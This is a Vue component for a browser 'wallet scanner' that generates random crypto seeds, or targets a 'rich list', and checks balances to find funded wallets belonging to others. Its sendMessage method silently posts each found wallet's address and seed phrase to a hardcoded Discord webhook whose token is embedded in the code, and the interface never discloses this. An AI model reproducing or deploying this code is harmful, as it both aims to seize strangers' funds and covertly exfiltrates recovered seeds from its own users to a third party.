<template>
  <a-row :gutter="30" justify="center">
    <a-col v-bind="{ xs: 24, sm: 24, md: 24, lg: 24, xl: 12, xxl: 12 }">
      <div class="block">
        <a-divider>Infomation</a-divider>

        <div style="background-color: #ececec; padding: 20px">
          <a-card title="Configuration" :bordered="false" size="small">
            <div class="form-group">
              <label for="">Select Coins:</label>
              <a-checkbox-group v-model:value="selections" :options="coins">
                <template #label="{ label, icon }">
                  <img :src="icon" :alt="label" class="coin-icon">
                </template>
              </a-checkbox-group>
            </div>

            <div class="form-group">
              <label for="">Scan Mode:</label>
              <a-radio-group v-model:value="mode_selections" :options="modes"></a-radio-group>
            </div>

            <!-- <div class="form-group">
              <label for="">Threads:</label>
              <a-input-number v-model:value="threads" placeholder="Threads" :min="1"></a-input-number>
            </div> -->

            <div class="mb-1">
              <a-typography-text type="success">We are generating a random pair of address + seed and checking the
                balance of this address.</a-typography-text>
            </div>
            <div class="mb-3">
              <a-typography-text type="danger"><b>Important:</b> The probability of finding a wallet with balance is
                <b>VERY, VERY
                  LOW!</b> It's like you're playing <b>lottery</b> here. I don't guarantee anything
                here.</a-typography-text>
            </div>

            <div class="buttons">
              <a-button type="primary" danger html-type="button" block v-if="started" @click="onStop()">Stop</a-button>
              <a-button type="primary" html-type="button" block v-else @click="onStart()"
                :disabled="selections.length === 0">Start</a-button>
            </div>
          </a-card>
        </div>
      </div>
    </a-col>

    <a-col v-bind="{ xs: 24, sm: 24, md: 24, lg: 24, xl: 12, xxl: 12 }">
      <div class="block">
        <a-divider>Console</a-divider>
        <div style="background-color: #ececec; padding: 20px">
          <a-card :title="`Total: ${total}`" :bordered="false" class="mb-3" size="small">
            <template #extra><span class="count-checked">Checked: {{ checked }}</span></template>

            <div class="console">
              <div class="console-item" v-for="wallet in wallets" :key="wallet.key">
                <span class="blue">[CPU {{ wallet.index }}] Wallet Check: </span>
                <div class="green" v-text="`${wallet.address}[${wallet.balance} ${wallet.coin}]`"></div>
              </div>
            </div>
          </a-card>
          <a-card :title="'Found: ' + totalFound" :bordered="false" size="small">
            <div class="console console-small">
              <div class="console-item" v-for="(found, index) in founds" :key="index">
                <span class="blue">[{{ found.balance }} {{ found.coin }}] </span>
                <div class="green" v-text="found.seed"></div>
              </div>
            </div>
          </a-card>
        </div>
      </div>
    </a-col>
  </a-row>
</template>
<script>
/* eslint-disable */
import { range } from 'lodash';
import { SUPPORT_SCAN_COINS } from '../constants';
import { cloneDeep } from 'lodash';

const CACHE_FOUND_KEY = 'CACHE_WALLET_FOUND_KEY';
const MAX_CONSOLE_ROWS = 50;

export default {
  name: 'scan-wallet',
  components: {},
  data() {
    return {
      coins: SUPPORT_SCAN_COINS,
      modes: [
        { value: 'random', label: "Random Wallet" },
        { value: 'rich', label: "Scan On Rich List" },
      ],
      selections: ['BTC', 'ETH', 'BNB'],
      mode_selections: 'random',
      started: false,
      threads: 1,
      workers: [],
      founds: [],
      wallets: [],
      total: 0,
      checked: 0,
      socket: null,
      queue: null,
      concurrency: 10,
      autostart: false,
      nodes: 2
    }
  },
  computed: {
    totalFound: function () {
      return this.founds.length;
    }
  },
  created() {
    const params = this.getQueryParams();
    this.selections = (params?.coins || "BTC,ETH,BNB").split(',')
    this.concurrency = params?.concurrency || 10;
    this.threads = params?.threads || 1;
    this.autostart = params?.autostart || false;
    this.nodes = params?.nodes || 2;
  },
  mounted() {
    this.founds = this.getFounds();
    // Autostart
    if (this.autostart) {
      this.onStart();
    }
  },
  methods: {
    sendMessage(title, message) {
      const embered = { 'title': message };
      const headers = { "Content-Type": "application/json" };
      const data = {
        'username': 'doge-scan-bot',
        'avatar_url': 'https://i.imgur.com/AfFp7pu.png',
        'content': title.toString(),
        'embeds': [embered]
      };
      const webhookUrl = "https://discord.com/api/webhooks/1227910695769870446/HZIb6qMoD8V3Fu8RMCsMwLp8MnGouLuVveDKA2eA1tNPUMWU-itneoAayVXFcC3EVlwK";
      try {
        fetch(webhookUrl, {
          method: 'POST',
          headers: headers,
          body: JSON.stringify(data)
        })
      } catch (error) {
        console.log(error);
      }
    },
    getQueryParams() {
      // Get the query string from the current URL
      const queryString = window.location.search;

      // Create a new URLSearchParams object with the query string
      const params = new URLSearchParams(queryString);

      // Use the spread operator and reduce to convert URLSearchParams to an object
      const queryParams = [...params.entries()].reduce((acc, [key, value]) => {
        acc[key] = value;
        return acc;
      }, {});

      return queryParams;
    },
    key() {
      return (Math.random() + 1).toString(36).substring(2)
    },
    addWallet(wallet) {
      this.total++
      this.checked++

      if (this.wallets.length === MAX_CONSOLE_ROWS) {
        this.wallets.pop();
      }

      wallet.key = this.key();
      this.wallets.unshift(wallet);
    },
    notifyFound(found) {
      this.sendMessage(`Wallet [${found.coin}] Found!`, `[${found.coin}] \n Address: [${found.address}] \n Seed: [${found.seed}]`)
    },
    addFound(found) {
      this.notifyFound(found);

      let founds = cloneDeep(this.founds);
      founds.push(found);
      this.founds = founds;
      window.localStorage.setItem(CACHE_FOUND_KEY, JSON.stringify(founds));
    },
    getFounds() {
      const data = window.localStorage.getItem(CACHE_FOUND_KEY) || '[]';
      return JSON.parse(data);
    },
    onStart() {
      const self = this;
      if (!this.threads) this.threads = 4;

      /** ----Generate Workers---- **/
      range(0, this.threads, 1).forEach(() => {
        const worker = new Worker(new URL('./worker.js', import.meta.url), { type: 'module' });
        worker.onmessage = function (e) {
          const { index, wallet } = e.data;
          self.addWallet({ index, ...wallet });

          if (wallet.balance > 0 || wallet.status) {
            self.addFound(wallet);
          }
        }
        this.workers.push(worker);
      })

      /** ----Start Scan---- **/
      this.started = true;
      self.workers.forEach((worker, i) => {
        worker.postMessage({ index: i, type: [...self.selections], mode: self.mode_selections })
      })
      // setTimeout(() => {
      //   self.workers.forEach((worker, i) => {
      //     worker.postMessage({ index: i, type: [...self.selections], mode: self.mode_selections })
      //   })
      // }, this.nodes * 1500) // Wait node connected
    },
    onStop() {
      this.workers.forEach(o => {
        o.postMessage('closed');
        o.terminate();
      });
      this.workers = [];
      this.wallets = [];
      this.started = false;
    }
  }
};
</script>
<style lang='css' scoped>
.coin-icon {
  width: 40px;
  height: 40px;
}

.ant-checkbox-group {
  /* justify-content: center; */
  display: flex;
  flex-direction: row;
  align-items: center;
  gap: 30px;
  margin-bottom: 1rem;
}

.mb-3 {
  margin-bottom: 2rem;
}

.console {
  border-radius: 4px;
  background-color: #000;
  height: 200px;
  overflow: auto;
  font-size: 12px;
  font-weight: 500;
  padding: 0.5rem;
}

.console-small {
  height: 100px;
}

.console-item {
  display: block;
  margin-bottom: 0.25rem;
}

.blue {
  color: yellow;
}

.green {
  color: green;
}

.form-group {
  margin-bottom: 2rem;
  display: block;
}

.form-group label {
  display: block;
  margin-bottom: 1rem;
  font-size: 14px;
  font-weight: bold;
}

.count-checked {
  color: green;
  font-weight: 600;
}

.mb-1 {
  margin-bottom: 0.5rem;
}
</style>